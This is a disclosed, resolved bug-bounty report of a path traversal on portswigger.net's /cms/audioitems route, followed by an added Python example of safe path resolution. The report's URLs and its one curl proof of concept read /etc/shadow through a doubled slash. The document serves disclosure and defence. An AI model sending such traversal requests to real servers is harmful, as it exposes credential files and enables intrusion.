[portswigger.net] Path Traversal at /cms/audioitems

Disclosed: 2024-04-04 14:51:59 By 0xd0m7 To portswigger
High
Vulnerability Details
Prelude. I wasn't going to report it; I thought it was your laboratory, but after my first analysis this seems real.

**Description**

A path traversal as the root user was detected that allows remote attackers to see internal files as root.

`https://portswigger.net/cms/audioitems//etc/networks`

`https://portswigger.net/cms/audioitems//etc/shadow`

**PoC**

`curl -kis "https://portswigger.net/cms/audioitems//etc/shadow"`

{F3132191}

## Impact

Ability to read internal files as root
Report Stats
  • Report ID: 2424815
  • State: Closed
  • Substate: resolved
  • Upvotes: 133
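
The report does not say how the server mapped the URL to a file. The following is an added example, not code from the report or from PortSwigger: it assumes a handler that joins a storage root with whatever follows `/cms/audioitems/`, and shows why a doubled slash defeats a naive join and how a containment check rejects it. `BASE_DIR`, `ROUTE_PREFIX` and all function names are hypothetical.

```python
import os
from typing import Optional
from urllib.parse import unquote, urlsplit

BASE_DIR = "/srv/cms/audioitems"    # hypothetical storage root (assumption)
ROUTE_PREFIX = "/cms/audioitems/"   # route taken from the URLs in the report


def remainder_from_path(request_path: str) -> str:
    """Return the percent-decoded part of the URL path after the route prefix."""
    path = unquote(urlsplit(request_path).path)
    if not path.startswith(ROUTE_PREFIX):
        raise ValueError("not an audioitems path")
    return path[len(ROUTE_PREFIX):]


def naive_resolve(remainder: str) -> str:
    """Unsafe pattern: os.path.join drops BASE_DIR when remainder is absolute."""
    return os.path.join(BASE_DIR, remainder)


def safe_resolve(remainder: str) -> Optional[str]:
    """Return a path inside BASE_DIR, or None when the request must be refused."""
    if not remainder or "\x00" in remainder:
        return None
    # Refuse absolute remainders outright instead of silently rewriting them.
    if remainder.startswith(("/", "\\")) or os.path.isabs(remainder):
        return None
    base = os.path.realpath(BASE_DIR)
    # realpath collapses ".." and follows symlinks before the containment check.
    candidate = os.path.realpath(os.path.join(base, remainder))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample request paths; the first mirrors the shape in the report.
    for p in ("/cms/audioitems//etc/shadow",
              "/cms/audioitems/..%2f..%2f..%2fetc/passwd",
              "/cms/audioitems/intro/track01.mp3"):
        rem = remainder_from_path(p)
        print(f"{p!r}: naive={naive_resolve(rem)!r} safe={safe_resolve(rem)!r}")
```

Running the file server as an unprivileged user limits what any remaining traversal can read, independent of the path check.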